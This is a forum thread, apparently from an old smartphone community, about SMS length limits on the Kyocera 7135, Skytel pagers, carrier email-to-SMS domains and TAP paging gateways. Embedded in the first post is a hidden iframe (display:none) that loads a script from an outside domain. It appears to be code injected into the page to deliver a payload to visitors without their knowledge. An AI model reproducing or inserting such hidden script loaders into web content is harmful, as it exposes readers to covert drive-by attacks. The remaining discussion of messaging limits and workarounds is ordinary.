+ Reply to Thread

Thread: SMS length

PPC6800 OWNER (ALLTEL SERVICE) GREGHARKINS's Avatar

SMS length

Does anyone know if the default setting of 160 is all the phone will take or is it carrier dependant on the length of the SMS.

I found the settings in the 111111 options programming but I didnt want to change it until i had an answer.

Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    GREG HARKINS
    GREGHARKINS@BRINGINGFUNTOYOU.COM
    www.bringingfuntoyou.com

Carrier limited. It's controled at the handset to prevent the user from being mad that the whole message did not go through.

SMS Message Length

We are migrating a bunch of our employees to 7135's, but we're having a message length issue when communicating between our Skytel 2 way pagers and our 7135's. We have about 1800 Motorola SkyWriters and TimePort 2 way pagers and a rapidly growing number of 7135's (about 75 so far and we haven't formally approved their use yet). Our Skytel users are not used to having to limit the length of their messages and our 7135 users wind up getting a lot of truncated SMS messages. Our business informally runs on 2 way messaging...

So the SMS 160 character limitation just isn't working for us. The only suggestion I've heard so far (from Kyo and VZ) is to implement an internal TAP paging gateway that would break big messages into multiple 160 character chunks (wonder why VZ hasn't updated vtext with a TAP paging gateway?).

Anyway, before going through the effort of evaluating TAP systems I thought I'd ask the message length question here and see if anyone has any other suggestions. This is the last major hurdle before we open the floodgates on these devices, so I'd really like to get it resolved.

Thanks!
    Mike

Administrator
    i think you are stuck with the limitation... 160 is the standard i believe?!

can you have the pagers send an email to the phones? i haver not used a sky pager (or any pager for tha matter) since the early 90's so i dont know what they can do now, but if they can send a message tro a email addy then that seems like the best route...

Actually, 180 is more so the standard max, but Nortel is more limited than Lucent and others.

By the way, the 7135 is capable of >180 messages, it just sends multiple SMS messages and breaks them into the max allowable per message. THe carrier needed to set that up in the handset when it was configured at the factory though.

Re: SMS Message Length

Originally posted by ITGeek
    Anyway, before going through the effort of evaluating TAP systems I thought I'd ask the message length question here and see if anyone has any other suggestions. This is the last major hurdle before we open the floodgates on these devices, so I'd really like to get it resolved. Thanks! Mike
    vtext has some limitations but is pretty good (its free) for sending alerts and single small messages. it falls short when trying to sms a complete email which is why we are in the middle of a beta test (www.emailpush.com) trying to work around vtext's limitations. we are trying to see if we can work within the vtext limitations. get on the beta and try it out for free to get an idea of what we are trying to do. +++ craig
    www.EmailPush.com
    Email + SMS = Power

SMS length

Skytel does allow email addresses and that's pretty much all we use for addressing on those devices. When we evaluated the Treo on the Sprint network I had a pretty good workaround. Sprint provides an email account with the phone, so I advertised that address instead of the SMS address and had SMS notification turned on when new messages arrived. The big problem with Sprint is that they don't support 2 way SMS, so you can't just reply to a message.

Ease of use is critical for us. Going from an SMS tool to an email tool to reply to a page is rather cumbersome, especially when you are use to just immediately replying. VZ doesn't provide the email account and we aren't quite ready to allow our mobile devices access our internal network (security issues), so that wouldn't help with the long messages.

Since we don't allow mobile access into our network yet, we can't cost justify the additional expense for VZ's express network. So even using personal email accounts would be painful since we would need to manually make a network connection just to check a page that gets truncated. And we get a LOT of pages, it's part of our company culture. We can be in meetings and have multiple text messaging conversations happening in the background while the meeting is progressing. It's an interesting environment and people quickly become dependent on text messaging.

One of my pet peeves with the 7135 SMS tool is that it doesn't just pop up SMS messages as they arrive, you have to manually switch to the messages app and then change from the outbox to the inbox. If the device is going to interupt me, it should just interupt me with the message directly and give me an immediate chance to reply, but that's a different issue that I've already discussed with the folks at KYO. "Feature enhancement request"

Anyway, I was able to evaluate just about every PocketPC and Palm based Smartphone that was available 3-6 months ago (got my hands on a Verizon 7135 from one of their test engineers before they formally released it) and the 7135 is by far the best all purpose phone around. VZ's SMS implementation for paging is also closest to what we are use to on the Skytel network. Looks like I'll just have to look into a TAP paging gateway to resolve the message length issue.

The main problem with an internal TAP gateway is ensuring 100% reliability. It requires that you setup internal paging addresses (i.e., name@paging.company.com) and the gateway routes the messages in 160 character chunks to the appropriate vtext.com address. We rely on text messaging extensively and treat it like a utility -- always on and never fails. The TAP solution introduces another potential point of failure. My preference would be for Verizon to solve this problem for everyone instead of requiring that companies figure out and implement individual solutions...

Re: SMS length

[QUOTE]Originally posted by ITGeek
    Ease of use is critical for us. Going from an SMS tool to an email tool to reply to a page is rather cumbersome, especially when you are use to just immediately replying.

With a 7135 and VZ you get a prompt of the sms message then you click goto and can immediatley reply? this can be a canned message or you can type a message out.

VZ doesn't provide the email account and we aren't quite ready to allow our mobile devices access our internal network (security issues), so that wouldn't help with the long messages.

correct in that you get a sms "email" address with VZ but not a pop/imap address. how we have it setup is with a emailpush.com address which does 2 things : it chops up an email into 3 chunks and sends them via sms and it also fowards the original email to another email address which could be inside your corporate net.

So even using personal email accounts would be painful since we would need to manually make a network connection just to check a page that gets truncated.

i agree with your pain which is why we send 3 chunks of the email via sms (so that you can make a better determination if you need to connect to download the complete message) and also foward the original email to another email account of your choice.

And we get a LOT of pages, it's part of our company culture. We can be in meetings and have multiple text messaging conversations happening in the background while the meeting is progressing. It's an interesting environment and people quickly become dependent on text messaging.

seems interesting

One of my pet peeves with the 7135 SMS tool is that it doesn't just pop up SMS messages as they arrive, you have to manually switch to the messages app and then change from the outbox to the inbox. If the device is going to interupt me, it should just interupt me with the message directly and give me an immediate chance to reply, but that's a different issue that I've already discussed with the folks at KYO. "Feature enhancement request"

i dont follow this ? when i get an sms message the 7135 informs me so i push the ok button to go to the message i then push ok again to select it to read and hit reply or go back to read the next chunk (by hitting the ok button again)

why do you emtion bouncing into and out of the outbox and inbox?

Looks like I'll just have to look into a TAP paging gateway to resolve the message length issue. The main problem with an internal TAP gateway is ensuring 100% reliability. It requires that you setup internal paging addresses (i.e., name@paging.company.com) and the gateway routes the messages in 160 character chunks to the appropriate vtext.com address. We rely on text messaging extensively and treat it like a utility -- always on and never fails. The TAP solution introduces another potential point of failure.

all good points which is why we are trying to work within the vtext infastructure.

My preference would be for Verizon to solve this problem for everyone instead of requiring that companies figure out and implement individual solutions...

mine too but dont hold your breath on that wish we are pretty close in what you want to accomplish above but still need to get some time to develop a better way of informing you the order in which to read the 3 "chunks" you get via sms. the vtext network doesnt process messages per time stamp so the order which they send them out can change also you can also run into a delay on the vtext network ++++ craig
    www.EmailPush.com
    Email + SMS = Power

Re: SMS length

Originally posted by ITGeek
    Skytel does allow email addresses and that's pretty much all we use for addressing on those devices.
    You sound like you work at my company ! Most people are still carrying 2-way pagers (Skytel or Arch) but many are switching over to cell phones. A few of us have smartphones. As a result, we are adjusting to largest number of characters (110) which everyone can view when sending group pages and many of us keep this info handy when sending individual messages:

Messaging Domains
    @vtext.com (160 characters)
    @archwireless.net (200 characters)
    @skytel.com (200 characters)
    @messaging.sprintpcs.com (160 characters)
    @mobile.att.net (110 characters)
    @messaging.nextel.com (140 characters)
    @mobile.mycingular.com (160 characters)
    @pacbellpcs.net (160 characters)
    @voicestream.net (140 characters)
    @mobile.surewest.com
    @alltelmessage.com

Ease of use is critical for us. Going from an SMS tool to an email tool to reply to a page is rather cumbersome, especially when you are use to just immediately replying. VZ doesn't provide the email account and we aren't quite ready to allow our mobile devices access our internal network (security issues), so that wouldn't help with the long messages.
    Ditto on the security restrictions in my yard. However, we are letting Blackberry devices on for some of our senior leadership team members. I don't want one because I depend too much on my Palm software.

And we get a LOT of pages, it's part of our company culture. We can be in meetings and have multiple text messaging conversations happening in the background while the meeting is progressing. It's an interesting environment and people quickly become dependent on text messaging.
    (Dang, I wonder if we are in same building let alone work for the same company!) Using a smartphone is still a little unusual in meetings but I figure people will come around because of the Blackberry units. Since I don't plan to get a Blackberry, I'm trying to get our internal instant messaging system to work. If I can, I might return to Wireless Sync and remain on (dormant) all day.

AMEN to that! Someone should create a hack to make the inbox the default whenever starting Messages.

The main problem with an internal TAP gateway is ensuring 100% reliability. It requires that you setup internal paging addresses (i.e., name@paging.company.com) and the gateway routes the messages in 160 character chunks to the appropriate vtext.com address. We rely on text messaging extensively and treat it like a utility -- always on and never fails. The TAP solution introduces another potential point of failure. My preference would be for Verizon to solve this problem for everyone instead of requiring that companies figure out and implement individual solutions...
    Again, AMEN! Not to shut out entrepreneurial efforts, but this should be solved at the carrier level.

Re: Re: SMS length

Originally posted by Beryl
    You sound like you work at my company ! Most people are still carrying 2-way pagers (Skytel or Arch) but many are switching over to cell phones. A few of us have smartphones. As a result, we are adjusting to largest number of characters (110) which everyone can view when sending group pages and many of us keep this info handy when sending individual messages:
    Thanks Beryl! We pretty much standardize our services, so Verizon and Skytel are the key players for us, which means 160 characters is our max. The problem is that we have so many people with Skytel 2 way pagers who have had them for years that it's hard to get them to think about message lengths.

Our environments do sound similar. The emailpush solution sounds interesting, but there's no way our information protection folks would allow our messages to be routed through a third party provider (they even complain about messages being routed through the cellular and paging providers!).

We also looked at the blackberry devices from multiple providers, but they seem very proprietary end-to-end. The 7135's have been pretty popular even without the thumb-keyboards that our skytel users are familiar with and are WAY more flexible than Blackberry devices, imho. We had one executive evaluate a blackberry first then the 7135 and he preferred the 7135 because of the additional applications available for it. Most non-Palm users so far have just been using the soft-keyboard and have found it acceptable.

Looks like a TAP server will need to be in our roadmap...

Mike